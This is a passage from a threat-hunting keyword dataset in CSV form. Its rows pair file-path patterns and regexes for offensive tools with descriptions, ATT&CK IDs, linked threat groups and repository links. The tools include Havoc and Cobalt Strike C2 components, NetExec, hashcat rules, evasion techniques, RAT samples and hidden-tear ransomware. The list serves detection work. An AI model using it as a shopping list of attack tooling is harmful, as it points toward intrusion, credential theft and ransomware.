Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","7720" "*/handlekatz.py*",".{0,1000}\/handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - 
T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7721" "*/HandleKatz_BOF*",".{0,1000}\/HandleKatz_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","N/A","10","10","96","18","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z","7722" "*/Harmmy Rat 
v1.*.exe*",".{0,1000}\/Harmmy\sRat\sv1\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7723" "*/HaryyUser.exe*",".{0,1000}\/HaryyUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","7724" "*/hash_spider.py*",".{0,1000}\/hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7725" "*/hashcat*",".{0,1000}\/hashcat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7726" "*/hashcat-rule.git*",".{0,1000}\/hashcat\-rule\.git.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","7727" "*/hashcrack_com.rb*",".{0,1000}\/hashcrack_com\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","7728" "*/hashcracking.rb*",".{0,1000}\/hashcracking\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","7729" "*/hashdump_dc*",".{0,1000}\/hashdump_dc.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","7730" "*/hashesorg2019.gz*",".{0,1000}\/hashesorg2019\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","7731" "*/Hashi0x/*",".{0,1000}\/Hashi0x\/.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","network exploitation tool","N/A","","N/A","","","","7732" "*/hashview.py*",".{0,1000}\/hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","7733" 
"*/havex.profile*",".{0,1000}\/havex\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","7734" "*/Havoc.cpp*",".{0,1000}\/Havoc\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command 
and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7735" "*/Havoc.qss*",".{0,1000}\/Havoc\.qss.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7736" "*/Havoc.rc*",".{0,1000}\/Havoc\.rc.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7737" "*/Havoc/data/*",".{0,1000}\/Havoc\/data\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7738" "*/Havoc/main/*",".{0,1000}\/Havoc\/main\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is 
a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7739" "*/havoc_bof.py*",".{0,1000}\/havoc_bof\.py.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","1","N/A","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","7740" "*/HavocFramework/*",".{0,1000}\/HavocFramework\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7741" "*/HavocImages/*",".{0,1000}\/HavocImages\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7742" "*/havoc-py/*",".{0,1000}\/havoc\-py\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control 
framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","7743" "*/HavRat.exe*",".{0,1000}\/HavRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7744" "*/hbase-master-info.nse*",".{0,1000}\/hbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7745" "*/hbase-region-info.nse*",".{0,1000}\/hbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7746" "*/hddtemp-info.nse*",".{0,1000}\/hddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7747" "*/hDendron.cs*",".{0,1000}\/hDendron\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","7748" "*/HeapCrypt.git*",".{0,1000}\/HeapCrypt\.git.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","7749" "*/HellHall.git*",".{0,1000}\/HellHall\.git.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","7750" "*/HellsGate.git*",".{0,1000}\/HellsGate\.git.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","7751" "*/HellsHall.exe*",".{0,1000}\/HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","7752" "*/helperFunctions/Delregkey_hkcu.txt*",".{0,1000}\/helperFunctions\/Delregkey_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7753" "*/helperFunctions/Delregvalue_hkcu.txt*",".{0,1000}\/helperFunctions\/Delregvalue_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7754" "*/helperFunctions/dir_creator.txt*",".{0,1000}\/helperFunctions\/dir_creator\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7755" "*/helperFunctions/dir_lister.txt*",".{0,1000}\/helperFunctions\/dir_lister\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7756" "*/helperFunctions/Getallregkeys.txt*",".{0,1000}\/helperFunctions\/Getallregkeys\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7757" "*/helperFunctions/Getallregvalues.txt*",".{0,1000}\/helperFunctions\/Getallregvalues\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely 
in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7758" "*/helperFunctions/Getregvalue.txt*",".{0,1000}\/helperFunctions\/Getregvalue\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7759" "*/helperFunctions/Setregvalue_hkcu.txt*",".{0,1000}\/helperFunctions\/Setregvalue_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7760" "*/Heroinn.git*",".{0,1000}\/Heroinn\.git.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","7761" "*/Heroinn/*",".{0,1000}\/Heroinn\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by 
Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","7762" "*/heroinn_client/*",".{0,1000}\/heroinn_client\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#linux","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","7763" "*/hid_inject.*",".{0,1000}\/hid_inject\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","7764" "*/hid_sniff.*",".{0,1000}\/hid_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","7765" "*/HiddenDesktop.git*",".{0,1000}\/HiddenDesktop\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that 
allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","7766" "*/hidden-tear.exe*",".{0,1000}\/hidden\-tear\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","1","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","7767" 